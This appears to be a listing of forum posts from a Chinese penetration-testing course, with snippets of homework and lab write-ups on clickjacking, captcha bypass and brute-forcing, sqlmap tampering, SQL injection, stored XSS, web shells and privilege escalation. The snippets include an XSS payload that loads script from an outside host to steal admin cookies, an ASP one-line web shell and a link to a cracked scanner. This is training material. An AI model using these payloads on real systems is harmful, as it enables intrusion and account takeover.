【蓝胖】2.5 点击劫持
<!DOCTYPE HTML><html><head><title>点击劫持</title><meta charset="UTF-8"/><style>body{background-image:url( https://timgsa.baidu.com/timg?image&quali
【蓝胖】Python过验证码及密码爆破【作业】
#-*- coding:utf-8 -*-import sysimport requestsfrom PIL import Imagefrom PIL import ImageOpsfrom pytesseract import *import redef cut_image(image_): im=Image.open(image_) im=i
【蓝胖】Sqlmap Tamper 作业
#!/usr/bin/env pythonimport osimport refrom lib.core.common import singleTimeWarnMessagefrom lib.core.data import kbfrom lib.core.enums import DBMSfrom lib.core.enums import PRIORITYfrom lib.core.sett
【蓝胖】正式课作业 【待批改】
7ling 老师说以后把所有作业放在一个帖子里,我就放在一个帖子里了,每次在帖子里更新1.3、PHP表单验证 作业<meta charset="utf-8"><?php//简单防止SQL注入function fang_zhu_ru($sql){ //定义需要过滤的关键字 $keyword = 'select|insert|update|delete|\
分享一个超6的漏扫工具,漏洞一扫遍知!最新汉化版!
AWVS最新汉化版,嘿嘿,拿走不谢~仅供学习交流!切勿由于非法用途!链接: https://pan.baidu.com/s/1Dn2nq_VYI3ry5NLeIIjI1g 提取码: 4d3p
【蓝胖】第六章 提权
先用菜刀进去看发现 net user 拒绝访问,什么gui输入常用 DOS命令发现也是不行猜测服务器没有CMD,那我们就自己找个经过一番苦找,在一个目录下发现,CMD,在CMD上,右键访问虚拟终端发现可以了。鸡冻啊,先创建个普通账号,有事拒绝访问使用iis6直接访问,创建成功先提升至最高管理权限去找远程端口,PID是 1600PID对应3389远程试试,找到C盘根目录,完成!
【蓝胖】第五章 get shell
一进来就告诉你,要修改cookie还记得之前在留言板放了XSS吗,去看看管理员cookie试试插入cookie把cookie放到浏览器中成功进入后台,因为题目说要上床shell,找传点,添加产品上传自己的图片小马,<%eval request ("cc")%> 然后发现405报错,百度意思就是,说明已经上传了,但是解析出问题。看了是iis6.0的中间件,发
【蓝胖】靶场第三章 抓包
先到这个地址里看看,http://120.203.13.75:8001/admin/Login.asp试了常用的密码进不去。。设置代理抓包,把host改成本地127.0.0.1:8080的,还是不行用ModHeader插件,将Host设置为127.0.0.1:8080,Refere设置为http://127.0.0.1/admin123/default.asp (看的老师题解。。。)然后就没有然后
【蓝胖】靶场第四章 XSS存储型
直接给出了后台地址,试了之前密码都没用,就换个思路吧发现网站有留言板,嘿嘿,试试XSS不管了,一顿乱插提交刷新,发现有XSS漏洞的拆入存储型XSS<script src=http://t.cn/Rgdd5Y></script>提交后,就去后台等一会,发现有数据来了flag出现
【蓝胖】靶场第二章绕wtf
第一眼进入这个网站,同学们应该干嘛? 看有没有注入点,比如主页这个地址,可能就没有随便点一个新闻 171,试试 and 1=1 结果。。试试 order by 吧,结果是 11不行,10行,说明就是10啦试试cookie提交,下载插件,说话这个插件挺好用的,嘿嘿设置cookie=id=171 访问默认网页试试显示的还是171页面,说明cookie插入成功突发奇想(嘿嘿),试试admin